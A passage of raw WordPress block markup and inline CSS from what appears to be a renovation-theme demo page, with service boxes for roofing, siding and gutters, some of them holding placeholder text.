30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8084ee78-5871-48ad-a7a9-1e3b52164921\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"dd2fb7db-992d-423c-ac16-d676e4901ec9\"} -->\n<style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"02734963-0b31-4312-8c71-a66457a80c8b\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02734963-0b31-4312-8c71-a66457a80c8b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"180058dd-db27-45c4-a0de-f8703e853737\"} -->\n<style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"767f5573-d592-456c-a81e-eac9c44adadf\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-767f5573-d592-456c-a81e-eac9c44adadf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"6a884b41-c026-4a57-9b2b-25862220e646\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae0d7f03-a30d-438a-9db9-6de087194c7c\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-ae0d7f03-a30d-438a-9db9-6de087194c7c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7c398a30-3a74-4ab1-b45d-62ced1bb0f57\"} -->\n<style type=\"text/css\"> .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 